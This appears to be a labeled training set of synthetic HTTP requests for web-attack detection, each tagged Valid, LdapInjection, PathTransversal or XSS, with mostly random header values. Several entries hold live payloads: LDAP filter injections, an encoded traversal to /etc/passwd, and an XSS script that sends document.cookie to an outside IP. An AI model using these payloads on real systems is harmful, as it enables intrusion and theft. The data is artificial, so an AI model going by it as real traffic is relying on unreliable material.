GET /ewnsht1rsn/aYO5A8LCr2Mnsmc/saDEAc4mP/ngk/yx2m8OUdTKBMxliz8v/Jwindow.open/esgsRe/mb4LSN_QkBF6.jpeg?tiiuy6ra5tilo=i9KwqXXoIw&o3hoesgna=47406262&mlMgrmeVm8Ogtu=acEdkncipi&evz9rnhnesc=umbyJlI%40o&2daou=55&i8t0Zst=%29++++%28%7C+%28pgd%3Dsl4i*%29&nF3r.=z+hmoe6cnes&lee4cm=WOeldufh70eva&downsha625oapen=ay1do2&4ETndhqai=dsystemaa&B9yp@ZkU5u=7&HaNKeval32t2=tlklps&wBofol5hjh8p=m4r0qwbHz0ws HTTP/1.1
Host: www.EyihcRo.fr
Connection: eobeeIH
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: n-rpcici86
Cache-Control: no-transform
Client-ip: 146.107.64.207
Cookie: juys2=fielRns7nEla;K_Z2=hfeat;gmwpenlsh9=jhhtpass>n%;9a04ebilin5p=73529101;odld=3mmuMqY5@
Cookie2: $Version="91"
Date: Sat, 17 Apr 04 12:59:25 GMT
ETag: W/".VbtjpDV.j-vgalLst"
Expect: 100-continue
From: isJ1werq@waei.st
If-Modified-Since: Sun, 19 Oct 08 04:21:11 CET
If-Unmodified-Since: Mon, 09 Mar 09 03:53:08 CET
If-Match: "cA3hYR6DeOuMMRIhctj"
If-None-Match: "dOZhf4E9qU1BmPkNq"
If-Range: *
Max-Forwards: 4
MIME-Version: 3.2
Pragma: meen=Lseipnd
Proxy-Authorization: Digest username="xipatefi"
Authorization: Basic bWxnSDA6dHRlZWVlaWg=
Range: 6717-,60-,18458-657
Referer: http://Xu4sa.de/ymnDqcy/eipl/tmsgiem/hLaerl/aelo3ett.rar
TE: trailers
Trailer: From
User-Agent: Mozilla/2.6 (Windows; U; Win98 1.4; ll-ak; rv:3.2.4) Gecko/24294463
UA-CPU: 68000
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: drr/5.5 96.224.86.67:341, e6aana/0.1 235.255.73.189, FTP/8.4 111.137.6.237
Transfer-Encoding: gzip
Upgrade: segoo/3.8
Warning: 579 www.htehr.shtml:7460 "fyeYeyiN4nSSEx4" 
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38299
Start - Id: 38069
class: LdapInjection
GET /vERsRbtisodetT8fe/teooha6slo/e4IjbnI/gV7t0n9xuUojn-u_/nRlliiyelusjdxifh/includeJW58_GpOXF/rnE8wSZ/e7k7HmaJtnrn/efAnfN-Ef.shtml?4ertoeSrpeet=nf%29%28+++%7C+++%28qe4%3D*%29 HTTP/1.0
Host: 229.10.25.245
Connection: close
Accept: audio/x-wav, audio/*;q=0.8
Accept-Charset: x-mac-roman;q=0.0, big5;q=0.1, windows-1250;q=0.6
Accept-Encoding: *
Accept-Language: uets-ahhgoleo, qsmne-oei, feep-asde61s;q=0.5, edr-Ebpbcmho;q=0.3, enoi9cen-ba;q=0.6
Cache-Control: only-if-cached
Client-ip: 163.227.108.150
Cookie: otd=85266864;omdh=80;62iecs=ept1by6_y-v;mtbwi=mtum;wfiEov94ig8peka=o4e%~  yvn tbin
Cookie2: $Version="57"
Date: Sat, 12 Mar 05 13:37:21 UTC
ETag: W/"aqQyLq-Rgqc2QXcXU"
Expect: 100-continue
From: klienot@sqnSctf.com
If-Modified-Since: Mon, 03 Sep 07 12:09:15 UTC
If-Unmodified-Since: Sat, 18 Jun 05 13:24:40 UTC
If-Match: *
If-None-Match: *
If-Range: "-cD_2zmYX@xBt.3JA"
Max-Forwards: 6
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: 0eiAi6 etia=vaieJnc9
Authorization: Digest username="tezr"
Range: 77-,76-
Referer: /areOc.php
TE: trailers
Trailer: Accept
User-Agent: nynd/1.1.0.7
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5823x093
Via: FTP/4.4 www.teeLOto.js, 9.4 www.wdr1Nae.shtml
Transfer-Encoding: deflate
Upgrade: he4tl/7.5, euo/6.5, etH/9.6, aci/2.2, oojhe/4.2
Warning: 530 132.99.115.0 "etnafLfea7n8Inlen7u9" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 814494240740
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38069
Start - Id: 25417
class: Valid
GET /X@Kk3EmrmBo.O/dSjv6N7SR7h4_jRoF6H/K2htaccesn3MS@.e/MB4kkAIChdropJVkmM/fm8Oq9Mcmdo/bauDDtiyRqwuvLE/z543UVNo/t6l9je0dy3almtxeTa/b-/n7n/crronethte2eh5t/eutoe.jpeg?im=v2&JAH6tE_NGN=235111&gl5heregYlEf=w+&aorl=0&W4aronilLoSI=yn%3Ba+ertRnb%27%406%3E&25sti5sh=837&drej=ts8xeeAach8isossn&Nvlssieessye=9031793&24sTsatrEacsn=752685994&IxqA8uihi=hwiQIY HTTP/1.0
Host: www.eSArwia.it
Connection: fdiSeroe
Accept: text/plain
Accept-Charset: macintosh;q=0.6, isiri-3342;q=0.6
Accept-Encoding: 
Accept-Language: yAazte-d
Cache-Control: only-if-cached
Client-ip: 141.90.56.165
Cookie: osa=549452;hpn=7Yd;8t9weos=noder;FzuusrVtLI8@Yc=pWDm.l.;cDsOreoo3sjhu=a5sVLA3-dwjC
Cookie2: $Version="78"
Date: Fri, 05 Oct 07 24:53:55 CET
ETag: "Xdd.84jXtbLzHHV"
Expect: leet1lr
From: ledpneia@lcpqUt.de
If-Modified-Since: Sat, 06 Jan 07 04:25:39 GMT
If-Unmodified-Since: Sat, 06 Aug 05 04:07:01 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 855
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: hmMc hcaent=h2ppqntm
Authorization: uos1od t2eetSa=vnreewin
Range: 06-841799,-16,747140-
Referer: http://Amlrb.biz/wdan/Lhaw/spbxhq/Cdmi.bin
TE: trailers,deflate;q=0.9,trailers
Trailer: If-None-Match
User-Agent: dmt8oasdezdn
UA-CPU: x86
UA-Disp: 4448,2047,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 407x092
Via: 6.9 201.130.218.214, chtc/0.5 www.aerutta.js, lrav/3.0 191.30.250.26
Transfer-Encoding: gzip
Upgrade: etmen/5.3
Warning: 257 2.176.158.197 "ifnht" 
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 588564161052
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25417
Start - Id: 15067
class: Valid
GET /crfioqlnrmte5ln4t/eMJ-X0Uld_rcQ39R/sNNinAl6b.pl?kTeIV-@5@95S=od+iumail%27oto&tfroe2gt3hg=2eetw&luqza=w8EWslX&6bsma85dr9pe=ps4arepgdivt&znAt2taydo=3rftswunnzyr9irm&TQxtermobjectaccess_logzLC=body%2Bli%2F&tmltnaeiiA9a=16022786&whub=907&aib6Sser68v7i=297917230 HTTP/1.1
Host: www.toxbsnncun.biz:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, gzip
Accept-Language: 4-ye3utsa, isiEamnE-5iei;q=0.4, oaommi-xe;q=0.7, ywld-ht
Cache-Control: only-if-cached
Client-ip: 203.246.219.167
Cookie: rt9o=tdiyeaaformelshsahee;eqajanTtnM=ereotTtEte;ihilpasri= g;usa=hevalHeogwindow.openr;7stbzl=5351;7gKAinFKWJ_=ReDi Pn1(hhu[ese6tep
Cookie2: $Version="81"
Date: Sat, 31 Jan 09 15:20:08 UTC
ETag: W/"BPURqs9TynV9AREMCpZ"
Expect: 100-continue
From: yoa7I@ropq1e.be
If-Modified-Since: Sat, 01 Dec 07 12:25:20 CET
If-Unmodified-Since: Mon, 01 Feb 10 13:37:30 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Oct 04 04:51:45 UTC
Max-Forwards: 8667
MIME-Version: 2.9
Pragma: A91=f
Proxy-Authorization: Digest response="a5e6c9C505B71e1cDdCFdCdB3aF006A7"
Authorization: Basic b3dybzhtdGk6dGVlaWJn
Range: -3610,072048-063,-8
Referer: /9esdtzha/bu1gds/hnni8ni/feTce.exe
TE: gzip,deflate
Trailer: Max-Forwards
User-Agent: nhnB85nay http://www.nmcdso.com
UA-CPU: MIPS
UA-Disp: 3763,8529,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 656x086
Via: 8.7 www.sA0h.htm, HTTP/6.1 www.lnaanrbs.jpg, 4.7 www.hMhnti.png:8296
Transfer-Encoding: identity
Upgrade: ueemt/7.4, bah/0.8, rta/2.0, rbaf/1.3, siueo/2.5
Warning: 352 176.101.245.85 "VhmtzhedooeenorYir" "Tue, 05 Apr 05 11:56:04 CET"
X-Forwarded-For: 145.80.124.77
X-Serial-Number: 618402796
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15067
Start - Id: 37365
class: LdapInjection
GET /ljQFNx/phs0aooHetda7oRr/aXh/e2.bbR_/eqYflvMZU3LOXsfy59Gb/o6geRj/rdAMGAWrTCswzv59S/tzRlWi9756nyWbhZxJ/mgJ7@0050/crn00synUlnhast/t4Fl7Rpyqjml0eeao/aNMnEmfdoekEtAelf.msf?hrhs=56485&Cst0e=75819&onntcoco=ititeblndoy&uatsrsotzu=cnodenT%3Bet%3Alhe4&b9eliNre23oln=fsfos%24rslikeeo&4v.@NbKobECE=tc&mpHvRB2Mhv=29785626 HTTP/1.1
Host: www.qWciebG8.net
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257;q=0.4, x-mac-korean;q=0.2, koi8-r;q=0.9
Accept-Encoding: )    (   |  (cn=*o    'brien*   )(mail=*o 'brien* ) 
Accept-Language: )   (|(displayName=had*)   (name =   had*  )( mail=had*  )
Cache-Control: only-if-cached
Client-ip: 117.148.34.106
Cookie: eb9n=glpriiQwnDaphrel;Eotssin=vniLz6xX;qK9htpassKT=6639434;fy9ne=Titir
Cookie2: $Version="89"
Date: Sun, 11 Apr 10 15:46:46 GMT
ETag: "oMs8GzOqOr@GyZXDx"
Expect: osmxe2=dnrEhje;ehUcdt
From: zhwiybw@hehuAUa89a.fr
If-Modified-Since: Sun, 06 Dec 09 08:28:34 UTC
If-Unmodified-Since: Fri, 20 Feb 04 24:08:25 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 22 Oct 07 03:12:31 GMT
Max-Forwards: 6
MIME-Version: 0.5
Pragma: tatf='ten'
Proxy-Authorization: NTLM d29uRWVtWXM5bzNyYW1obHphOXR1b2h0aHBOY2xub2VkY1Rm
Authorization: NTLM VTllaGNzaWFoc290bmVob3NkZ2V2YWZ4ZWlnZXdlb24=
Range: 257723-74,-66
Referer: /aomdaa/ia0out/9tlz/emetBe.aspx
TE: trailers,deflate,gzip;q=0.9
Trailer: If-Range
User-Agent: Mozilla/5.1 (Machintosh; U; PPC 3.5; je-ve; rv:5.9.6) Gecko/31984104
UA-CPU: MIPS
UA-Disp: 929,760,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5121x090
Via: ancee/8.2 www.huvnaeh.htm, 1.9 126.36.24.239:43
Transfer-Encoding: emee
Upgrade: oie/1.4, esndns/6.8, eengr0/5.0, e7la1/2.5
Warning: 670 195.185.136.48 "lepotnTerel" 
X-Forwarded-For: 183.74.149.62
X-Serial-Number: 30089699
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 37365
Start - Id: 36351
class: PathTransversal
GET /nHt/2QRMoTL@IViVgR/TyCOcyd@/fk4X/f1eTrxWsHpJI5.php?nmlanetgnyh1kt=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&ROe=4&mtpa6naiaidr=+%5Bt%3A+heI03%5Ch%24j HTTP/1.1
Host: 44.69.131.82
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: cpmAims-i8n, dsfmsho-erseOeed;q=0.1
Cache-Control: max-stale
Client-ip: 238.204.79.45
Cookie: hlOtpsaewh7re57=1299271;gWmhUg=242398838;l8e9tehhiyhie=i~hsopt[a0d|ev;dFEQLlLAMk=ebtSntrq;1Z5Sncx23VeQ@=er+;lhqiGTh1r=r%8)ies
Cookie2: $Version="7"
Date: Wed, 28 May 08 08:43:52 GMT
ETag: "cfqnbPK5k4tKX2_HzErM"
Expect: 100-continue
From: sotSFlSe@qiksat.biz
If-Modified-Since: Tue, 01 Jan 08 10:25:00 UTC
If-Unmodified-Since: Wed, 16 Jul 08 19:04:03 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 24 Apr 05 05:14:51 GMT
Max-Forwards: 57
MIME-Version: 5.3
Pragma: Eo7rmatt=owzPeti
Proxy-Authorization: Basic YXVJbnM6ZWhpcjFndHU=
Authorization: NTLM c2VuZTJzcnJvRXd3bmV4ZXJucnNjYTBkdDBlT2V2dGFhaTh3c2RoYm5hZA==
Range: 75-618834,757-411,77394-267269
Referer: /silEnrgl.php4
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/3.3 (X11; U; Unix 6.0; IN-el; rv:2.9.7) Gecko/41661137
UA-CPU: MIPS
UA-Disp: 7628,9010,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 636x8824
Via: FTP/5.9 183.122.153.177, HTTP/1.8 www.tm7w.jpeg
Transfer-Encoding: gzip
Upgrade: T8m/5.2, fg1ie/5.0, hrhh/0.4
Warning: 950 204.201.131.138 "a1desoZhspv" "Tue, 31 May 05 11:09:32 CET"
X-Forwarded-For: 217.52.49.74
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36351
Start - Id: 29953
class: Valid
GET /l04SbEreurles/Ktnpsrbbky4/nrreNsjmpahl/igqd5sG6LlrA/9toratogelz946e/rZS7/iiw11RMbNxO_Tgt5-gY/gf/tVftIps/jzBpSWwSyobjectvtB.jpg?tbl=8736934&Iuf=7fw&tce2e=tbW&Ra9eval6tGZ7Dp=o1K&lzhna=ioA&Syisp=t%3Aniftp+5vyhtrnbhnc&Cfmmuc=esd1rottidjibf&bO0mochaKCCBMElike=0hco&tmxih=xutake&LU0zpnOautoexecLMr=jue&pqb9TTrAy4=%28aaccept&u6ghitnuTemoSu=310&iSarlhAuoctpihs=da HTTP/1.1
Host: www.n5yhnqN.uk
Connection: t0ai
Accept: text/plain
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.1, gzip
Accept-Language: sxa6ojt-rwoetwol;q=0.8, pztElhS-enoit9e;q=0.9
Cache-Control: no-store
Client-ip: 86.24.254.167
Cookie: naon=a1lib])9ornehc[so;tsrhnupt=nullwnull r|dadminndm-aiMtp
Cookie2: $Version="85"
Date: Sat, 09 Sep 06 08:35:41 UTC
ETag: W/"_E9T1YxaIQ6t@7ajjrf8"
Expect: sp9u9b
From: otohir@ybNenoy.com
If-Modified-Since: Sat, 27 Dec 08 06:30:29 GMT
If-Unmodified-Since: Wed, 10 Mar 04 20:22:37 GMT
If-Match: "VtnbkjG5JcUopmiZCWXZ"
If-None-Match: *
If-Range: Mon, 10 Jan 05 17:06:48 UTC
Max-Forwards: 7
MIME-Version: 0.1
Pragma: S='c7'
Proxy-Authorization: elkidR hSthamtt=nsruueF
Authorization: Digest username="roe8tt"
Range: 054604-5
Referer: /Diuiae.tiff
TE: gzip
Trailer: Range
User-Agent: Mozilla/2.8 (compatible; MSIE 9.1; Unix; eumrhmm)
UA-CPU: MIPS
UA-Disp: 644,8528,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8863x9472
Via: HTTP/0.3 201.41.166.8, FTP/2.6 202.238.80.131, HTTP/5.2 www.gzxEe.js:9
Transfer-Encoding: compress
Upgrade: youp/5.6
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 223.222.247.27
X-Serial-Number: 7694011272
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 29953
Start - Id: 29849
class: Valid
GET /ettE/taurTt3krtamsmo/mo/dRbzL./u-lBjR9.tiff?has3H=4anepoa4euQ&rz=2&usadtHl=662889&JYbmhtpassJEsyeX=s%26 HTTP/1.1
Host: 172.89.125.60
Connection: r3eY
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: hef-IUoes8;q=0.6, ssam-2Mefisa;q=0.0, 0inRs-39, plemE9t-Jtoan;q=0.2
Cache-Control: no-store
Client-ip: 156.80.149.37
Cookie: sTedtoMd4dawx=00;edefnlTy=% 5wbpasswdrddrm 50optsdrtse;yFpRtI1veAm3=8906211520;6za0hkWreoLhito=ue2% g0nF(e<sitwwp
Cookie2: $Version="19"
Date: Sat, 07 May 05 23:00:48 GMT
ETag: W/"Wb958tQQhaImEh@XAw"
Expect: 100-continue
From: hggtsom6@ieylr.uk
If-Modified-Since: Fri, 05 Dec 08 02:32:52 UTC
If-Unmodified-Since: Tue, 28 Dec 04 20:19:23 CET
If-Match: "TRHcKIKpOtdTLlg-l"
If-None-Match: *
If-Range: "hgpuRlRe-NBd8-rTcu"
Max-Forwards: 2352
MIME-Version: 6.7
Pragma: nNagdhfc=pn3v
Proxy-Authorization: NTLM ZXNZaWVxQmRlZXljbWRpMWlxbW5lOW14Y2M4dW5SRWN6YXRlZWNzdG1zN2U=
Authorization: n8gso ixtifvEe=saeour
Range: -58988,5-,282881-
Referer: http://www.MIw2Izti.fr/teodnL/ched6enc/oTtaosob/setiaa/ierieoe.sh
TE: deflate,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/6.8 (compatible; Konqueror/8.0; Unix; fafdhsQ; nkiibnlld)
UA-CPU: MIPS
UA-Disp: 724,467,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 952x914
Via: 5.8 www.idNNaew.js, naeo/4.0 www.rmbnttNp.jpg, 7.6 206.253.182.195
Transfer-Encoding: deflate
Upgrade: exm/3.9, rRT/2.7
Warning: 996 159.207.202.137 "iaerlerhnkonrlcof" 
X-Forwarded-For: 87.103.209.5
X-Serial-Number: 74374524657
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29849
Start - Id: 34380
class: Valid
POST /e.zvsvKV7JB9Tum3e/KhLJQ.jpg? HTTP/1.0
Content-Length: 215
Content-Language: ekeo0
Content-Encoding: compress
Content-Location: http://www.mBefansr.ch/eeNttolt/wnSm.php3
Content-MD5: aFR0U25zYWxpaXRsVDhudQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 31 Mar 06 23:50:36 CET
Last-Modified: Fri, 22 Feb 08 14:05:27 UTC
Host: 137.86.104.167
Connection: teZta
Accept: audio/*;q=0.5, application/postscript, video/*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: o=nrdhinsg
Client-ip: 135.87.113.152
Cookie: lahfdNugsTltee=1lzktof
Cookie2: $Version="524"
Date: Wed, 04 Nov 09 03:13:46 UTC
ETag: "jzy7-kWTTfrqApq"
Expect: coehc
From: t2ao3Tim@5hsAsESuu.biz
If-Modified-Since: Mon, 21 May 07 02:37:08 CET
If-Unmodified-Since: Tue, 15 Feb 05 20:40:27 UTC
If-Match: *
If-None-Match: "eO-TiKvsn0W@Futy7E"
If-Range: Sat, 06 Dec 08 12:01:28 GMT
Max-Forwards: 71
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM c29vb2ZTUGlmbWw0YWlvZXNIaG90YUhkb2phaW8ybTBVd2FjaQ==
Authorization: Digest opaque="ailLr2o"
Range: 1-704
Referer: http://8enlth.ch/hqldnn/rwrHSate/stonvah/ddOee9tt/lophaa.cgi
TE: trailers
Trailer: Via
User-Agent: Mozilla/5.5 (Windows; U; Win98 0.7; aV-lN; rv:5.4.1) Gecko/99366593
UA-CPU: x86
UA-Disp: 404,187,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 015x732
Via: elvh/2.1 www.ifoE.js, 9.2 7.170.20.51:210
Transfer-Encoding: deflate
Upgrade: aa8el/9.2, rti/4.8, dpEae/4.2
Warning: 736 165.136.197.147 "ob0aohssh7zt" 
X-Forwarded-For: 107.108.232.99
X-Serial-Number: 71981796445551996576
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~

nihdttrla9tdr7o=485703&gE=|cathtta\heE-ecupdatee$&2a=g:nO60/&cEohale=226020&67eoshwui=8739&ttseepyhrfn=freo~ed 2&e8mhgOegr=eprocessing-instruction9cwrst&SBM5BwC.=7&iohOr8s6u=r1n9be1:zo|;u&Xo-AS=p94

End - Id: 34380
Start - Id: 28552
class: Valid
GET /eiA2v5Xo67LvXh2k.php4?rl=525&Hqs0bHzkse=Q4nrOfdn%2Biiq+et&input-ca-u=7069&ffteTn=5631&X6r-nodeCORjg=t%5C7eecuxhttpsat+tf&dSynontasstoa=98&9iplqPC=sp HTTP/1.1
Host: 34.218.36.145
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 81.119.248.8
Cookie: cwu4kEe=sgiaasLtEmya;jer7n=assgcg+ozo ;6include_v=133;hole0lte2Vo8=>;<cmdianDetarh9vnfm
Cookie2: $Version="101"
Date: Sun, 04 Nov 07 06:18:20 UTC
ETag: W/"J0JBa4INOpOLVXAht"
Expect: wauu9u
From: ekkeeGea@9uAbioy.it
If-Modified-Since: Thu, 31 Aug 06 22:16:42 UTC
If-Unmodified-Since: Sat, 27 Nov 04 19:53:18 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 25 Sep 04 02:35:08 CET
Max-Forwards: 133
MIME-Version: 8.0
Pragma: st6lih2N=e
Proxy-Authorization: Digest username="5oto"
Authorization: t7wOm njmotair=strft
Range: -485791
Referer: http://hfrb.de/rsqc8/Tfubedt/axiszTds/u9zs/irbt.msf
TE: chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.4 (Windows; U; Win98 0.5; nr-ie; rv:4.2.9) Gecko/32233557
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6545x8948
Via: 6.1 www.ooozaepw.htm, eattnn/1.8 www.6cteOEt.html
Transfer-Encoding: identity
Upgrade: lpo3mi/8.1, yla/6.6, eiam4/2.9
Warning: 943 www.0eTkm.jpeg "vada" "Wed, 23 Jun 04 24:08:28 UTC"
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 37650652134780806
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28552
Start - Id: 13900
class: Valid
GET /s3oreki3etaUAoo3t/e3VScZ-Sq-Rpz/i@gSZSfYH05Ah4YZgk/a-q_5jG/eetdieDhVes/r0@lpaqUGUrg80BG/nN-4pYtoGsECYRFPn/rtvnrenxqk3an/swuei/cmF8iDs/openbfpyrcp9k63pev.htm?eybg=%5Dl&43OLkD3_=iinx7sn&openpwnph-bn5WNiN3=wluS&fdoolt1t6=wflhin%3Cedtabg%5B3tdEn&e2rchry=4818&ra=687&1tfgEbiasE=0eoe&xFxtermg=z7ek&noclSluiyEl=tt1k1u6zThdS&eeluienn6yozowt=1eshsEc9oxnh HTTP/1.0
Host: www.A4EdUeon.com
Connection: close
Accept: video/*;q=0.8, text/*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, gzip, gzip, compress, compress;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 34.251.248.22
Cookie: erShluSnehdz=iL&(a-;evst4sz=hrvNtso4ue
Cookie2: $Version="01"
Date: Sat, 01 Mar 08 08:37:48 UTC
ETag: "vZfOTTbwicbYW0DedDv"
Expect: erdlrei
From: mshmtny@eieiosii.fr
If-Modified-Since: Wed, 25 Jun 08 08:05:46 GMT
If-Unmodified-Since: Tue, 21 Mar 06 13:25:55 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 915
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest username="oa1hT"
Authorization: Digest cnonce="tbde9"
Range: 914-
Referer: /eD6s1tn.nsf
TE: trailers,gzip,trailers
Trailer: Range
User-Agent: shejahou9eeOe44oHi
UA-CPU: Sparc
UA-Disp: 215,5211,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7739x7906
Via: 3.4 www.nk6auei.css, 0.0 www.ajepe.jpeg
Transfer-Encoding: gzip
Upgrade: ujteh/5.0, sh2/9.2, nct9Z/8.1
Warning: 289 117.168.162.177:92470 "leeeIdEeemiettoeetPe" 
X-Forwarded-For: 150.165.127.46
X-Serial-Number: 02052575004924
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13900
Start - Id: 39001
class: LdapInjection
POST /@JZ4n/aoukqDOZynUK1/1h8.php4? HTTP/1.1
Content-Length: 109
Content-Language: iotmsuet,8dvm
Content-Encoding: gzip
Content-Location: http://www.iEoy3Knn.be/loeoksn/Eoffhe/nieDiuyh/0w4hc.asmx
Content-MD5: dGhxcmlva1Z0d25sZXRlNg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Jul 05 21:07:29 UTC
Last-Modified: Fri, 30 Dec 05 11:43:08 GMT
Host: 188.107.119.207:1
Connection: keep-alive
Accept: audio/*, image/gif, image/*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.2, identity, deflate, identity, compress;q=0.7
Accept-Language: 6peo-Iyph
Cache-Control: Bs='dts'
Client-ip: 205.198.95.102
Cookie: eoeesetuero=tPer;sathhAD=Rhlom;e6al9=7;caeeaet=udivy-lrta 
Date: Sun, 25 Apr 10 15:30:16 GMT
ETag: W/"VPJnp3@veVviL60"
If-Unmodified-Since: Mon, 11 Jun 07 24:22:33 CET
If-Match: "xzYVfw_5@It4i0lNBG8"
If-None-Match: "NK_Ynt9S.qtIvuB4MAr"
If-Range: Wed, 09 Mar 05 01:14:24 GMT
Authorization: Digest nonce
Referer: http://eoMtou4s.gov/ntscgIs/aroj/eeno/sttwwe9h/thoIxp.php4
TE: chunked,trailers
User-Agent: )(    | (ssma8=un*)
UA-CPU: x86
Transfer-Encoding: identity

kEt8ahRPg=6&VqOYselecty_SW=u1igenwgidk&bFC=rarzs&phpefq=22&nuoem2elo=fz&6ieioinetios=kzsinuour5iaPpfln&ua=421

End - Id: 39001
Start - Id: 48083
class: XSS
GET /frJi/A0-var2d-pGM-/i5./oEKdxYwXrFl/icad/r@8rCShUXGb3BKVpqc/ewwpMeaieeo9j7rk/aYeTuciGaGODYtFupp/anSSC/dlH.oU.htm?uris8sndsjgih=68838&COndretrq=01&uinmGOjr=8519057&etoreea6wovhlt=%5B%5CxC0%5D%5B%5CxBC%5Dscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F6.133.79.20%2Fnede.php4%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+++%3E HTTP/1.0
Host: www.depsft.fr
Connection: ItdRd
Accept: */*
Accept-Charset: x-mac-turkish
Accept-Encoding: compress, gzip, identity;q=0.0, compress, gzip;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 220.26.106.26
Cookie: m0=1s ;V1wDS=sAeooszs;oleoersnra=wnqo5s3lu
Cookie2: $Version="5"
Date: Sun, 13 Jan 08 17:18:26 GMT
ETag: W/"d7O@30CYQD7MNCaw"
Expect: 100-continue
From: pr43lq@7remye.cz
If-Modified-Since: Sat, 12 Jul 08 18:49:49 CET
If-Unmodified-Since: Sat, 07 Jul 07 10:37:52 CET
If-Match: *
If-None-Match: "fuoh7eEbTW7LhPidu"
If-Range: "wSeAYVlhhzoj262IJ"
Max-Forwards: 6909
MIME-Version: 2.8
Pragma: aEa2inQh='m6lhiTte'
Proxy-Authorization: Basic bGVpbnJsaTpvb2lDbA==
Authorization: Rucfn yksNds=e8tWg
Range: -179295,540225-63
Referer: http://igsiws.uk/s04on/2cti/acua/ihhLeS.nsf
TE: trailers
Trailer: Max-Forwards
User-Agent: ahxel6 (nfv1gQkph4; diUEivGS; rtjQqU)
UA-CPU: StrongARM
UA-Disp: 4437,742,16
UA-OS: Win9x
UA-Pixels: 6001x2247
Via: FTP/3.9 96.5.18.94, FTP/2.2 www.aeuowt.gif
Transfer-Encoding: identity
Upgrade: latA/6.2, lyernh/8.8, vU0s/9.0, esnis/7.5
Warning: 178 250.228.149.199:2030 "1neeqi3e" "Sat, 26 May 07 03:25:33 CET"
X-Forwarded-For: 69.186.228.89
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48083
Start - Id: 23797
class: Valid
